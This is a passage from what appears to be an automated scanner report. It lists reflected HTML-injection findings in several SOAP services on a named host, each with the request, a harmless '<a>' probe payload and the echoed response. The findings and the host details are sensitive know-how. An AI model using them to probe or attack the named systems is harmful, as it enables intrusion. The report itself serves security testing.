Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/ChannelInfoService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7b0e2<a>32a22f94924 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/ChannelInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790&7b0e2<a>32a22f94924=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:08:13 GMT
Connection: close
Content-Length: 20181

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790&7b0e2<a>32a22f94924=1/ChannelInfoService.asmx" />
...[SNIP]...

1.52. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/ChannelInfoService.aspx [siteid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/ChannelInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload d6e5c<a>d9a3f24979b was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/ChannelInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790d6e5c<a>d9a3f24979b HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:08:11 GMT
Connection: close
Content-Length: 20169

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790d6e5c<a>d9a3f24979b/ChannelInfoService.asmx" />
...[SNIP]...

1.53. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/ClipInfoService.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/ClipInfoService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c4c49<a>7cb1e40de21 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/ClipInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790&c4c49<a>7cb1e40de21=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 02:38:26 GMT
Content-Length: 22408
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790&c4c49<a>7cb1e40de21=1/ClipInfoService.asmx" />
...[SNIP]...

1.54. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/ClipInfoService.aspx [siteid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/ClipInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload e18ca<a>6906893379b was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/ClipInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790e18ca<a>6906893379b HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 02:38:24 GMT
Content-Length: 22396
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790e18ca<a>6906893379b/ClipInfoService.asmx" />
...[SNIP]...

1.55. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/ErrorInfoService.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/ErrorInfoService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload cf283<a>e8b5e6bb6c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/ErrorInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790&cf283<a>e8b5e6bb6c4=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 02:38:31 GMT
Content-Length: 5637
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790&cf283<a>e8b5e6bb6c4=1/ErrorInfoService.asmx" />
...[SNIP]...

1.56. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/ErrorInfoService.aspx [siteid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/ErrorInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 150c4<a>00e4e98fd41 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/ErrorInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790150c4<a>00e4e98fd41 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 02:38:30 GMT
Content-Length: 5625
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790150c4<a>00e4e98fd41/ErrorInfoService.asmx" />
...[SNIP]...

1.57. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/PlaylistInfoService.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/PlaylistInfoService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 375a5<a>7fe89851c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/PlaylistInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790&375a5<a>7fe89851c3=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:08:03 GMT
Connection: close
Content-Length: 27394

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790&375a5<a>7fe89851c3=1/PlaylistInfoService.asmx" />
...[SNIP]...

1.58. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/PlaylistInfoService.aspx [siteid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/PlaylistInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload f7f5e<a>3ccf05f49f was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/PlaylistInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790f7f5e<a>3ccf05f49f HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:08:02 GMT
Connection: close
Content-Length: 27382

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790f7f5e<a>3ccf05f49f/PlaylistInfoService.asmx" />
...[SNIP]...

1.59. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/RSSService.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/RSSService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3ac06<a>42b3e8952f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/RSSService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790&3ac06<a>42b3e8952f7=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 02:38:30 GMT
Content-Length: 8814
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790&3ac06<a>42b3e8952f7=1/RSSService.asmx" />
...[SNIP]...

1.60. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/RSSService.aspx [siteid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/RSSService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 24326<a>3030b9b9796 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/RSSService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-23379024326<a>3030b9b9796 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 02:38:27 GMT
Content-Length: 8802
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-23379024326<a>3030b9b9796/RSSService.asmx" />
...[SNIP]...

1.61. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/RatingService.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/RatingService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 495d2<a>538293d5b25 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/RatingService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790&495d2<a>538293d5b25=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 02:38:27 GMT
Content-Length: 5534
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790&495d2<a>538293d5b25=1/RatingService.asmx" />
...[SNIP]...

1.62. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/RatingService.aspx [siteid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/RatingService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload f1f12<a>20b02dc54b6 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/RatingService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790f1f12<a>20b02dc54b6 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 02:38:25 GMT
Content-Length: 5522
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790f1f12<a>20b02dc54b6/RatingService.asmx" />
...[SNIP]...

1.63. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/AdServerService.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/AdServerService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 700ca<a>738587d8c77 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/AdServerService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793&700ca<a>738587d8c77=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 02:38:44 GMT
Content-Length: 1913
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793&700ca<a>738587d8c77=1/AdServerService.asmx" />
...[SNIP]...

1.64. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/AdServerService.aspx [siteid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/AdServerService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload f53b7<a>ee9f52a0ab8 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/AdServerService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793f53b7<a>ee9f52a0ab8 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 02:38:43 GMT
Content-Length: 1907
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793f53b7<a>ee9f52a0ab8/AdServerService.asmx" />
...[SNIP]...

1.65. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/ChannelInfoService.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/ChannelInfoService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a014e<a>6ade69e1294 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/ChannelInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793&a014e<a>6ade69e1294=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:23:22 GMT
Connection: close
Content-Length: 20181

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793&a014e<a>6ade69e1294=1/ChannelInfoService.asmx" />
...[SNIP]...

1.66. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/ChannelInfoService.aspx [siteid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/ChannelInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload e429d<a>9a69387f93 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

